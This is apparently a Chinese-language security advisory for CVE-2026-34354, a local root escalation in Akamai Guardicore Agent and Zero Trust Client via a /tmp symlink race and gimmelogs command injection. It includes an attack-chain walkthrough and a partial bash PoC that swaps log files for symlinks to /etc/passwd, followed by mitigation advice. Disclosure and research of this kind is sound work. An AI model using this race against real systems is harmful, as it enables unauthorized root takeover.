CVE-2026-34354 Akamai本地权限提升漏洞

漏洞信息

漏洞编号

CVE-2026-34354

漏洞类型

权限提升

CVSS评分

7.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Akamai Guardicore Platform Agent, Akamai Zero Trust Client

漏洞概述

Akamai Guardicore Platform Agent和Zero Trust Client在Linux和macOS平台上存在严重的本地权限提升漏洞。该漏洞源于GPA服务在/tmp目录下创建IPC套接字时的不安全配置，结合HandleSaveLogs()函数中的TOCTOU竞态条件，允许未授权用户操控日志文件。此外，root权限运行的诊断工具gimmelogs也存在命令注入漏洞。攻击者可利用这些缺陷将任意root拥有的文件变为全局可写，或执行任意命令，从而完全控制受影响系统。

技术细节

漏洞的核心在于TOCTOU（Time-of-Check to Time-of-Use）竞态条件与命令注入。首先，GPA服务在可全局写入的/tmp目录下创建IPC socket并接受未认证消息。当调用HandleSaveLogs()时，攻击者可以利用文件创建与打开之间的时间差，将日志文件替换为指向敏感文件（如/etc/passwd或/root/.ssh/authorized_keys）的符号链接。由于服务以root权限运行，这会导致目标文件被修改权限或内容。其次，诊断工具gimmelogs在处理dbstore输入时缺乏过滤，攻击者可通过构造特定载荷注入恶意命令，直接获取root shell。

攻击链分析

STEP 1

侦察与识别

攻击者确认目标系统运行了易受攻击版本的Akamai Guardicore Platform Agent (7.0-7.3.1) 或 Zero Trust Client (6.0-6.1.5)。

STEP 2

竞态条件利用

攻击者监控/tmp目录，等待GPA服务创建日志文件，利用TOCTOU漏洞在文件被打开前将其替换为指向敏感系统文件（如/etc/passwd）的符号链接。

STEP 3

命令注入利用

攻击者利用gimmelogs工具的命令注入漏洞，通过dbstore向其发送恶意构造的输入，诱导其以root权限执行攻击者指定的系统命令。

STEP 4

权限提升

通过上述任一方式，攻击者成功修改了root拥有的文件权限或执行了root命令，从而获得系统的最高控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-34354: TOCTOU Race Condition in Akamai Guardicore
# This script attempts to exploit the HandleSaveLogs vulnerability.

TARGET_FILE="/etc/passwd"
LOG_FILE_PATTERN="/tmp/gpa_log_*"

echo "[*] Starting exploit for CVE-2026-34354..."

# Monitor /tmp for the log file creation and race to symlink it
while true; do
    # Find the recently created log file (implementation depends on exact timing)
    LOG_FILE=$(ls -t $LOG_FILE_PATTERN 2>/dev/null | head -n 1)
    
    if [ -n "$LOG_FILE" ]; then
        echo "[+] Found log file: $LOG_FILE"
        # Remove the file and create a symlink to the target
        rm -f "$LOG_FILE"
        ln -s "$TARGET_FILE" "$LOG_FILE"
        echo "[+] Symlink created: $LOG_FILE -> $TARGET_FILE"
        
        # Trigger the IPC message to save logs (this step requires knowing the IPC protocol)
        # For demonstration, we assume the event is triggered automatically or by another process
        echo "[*] Waiting for the GPA service to write to the symlink..."
        sleep 2
        
        if [ -L "$LOG_FILE" ]; then
            echo "[!] Exploit attempt finished. Check if $TARGET_FILE is modified."
            break
        fi
    fi
done

影响范围

Akamai Guardicore Platform Agent 7.0 至 7.3.1

Akamai Zero Trust Client 6.0 至 6.1.5

防御指南

临时缓解措施

如果无法立即升级，请严格限制本地用户访问权限，确保只有受信任的管理员才能登录系统。同时，监控GPA服务和gimmelogs工具的异常行为，特别是对/tmp目录下文件的频繁操作。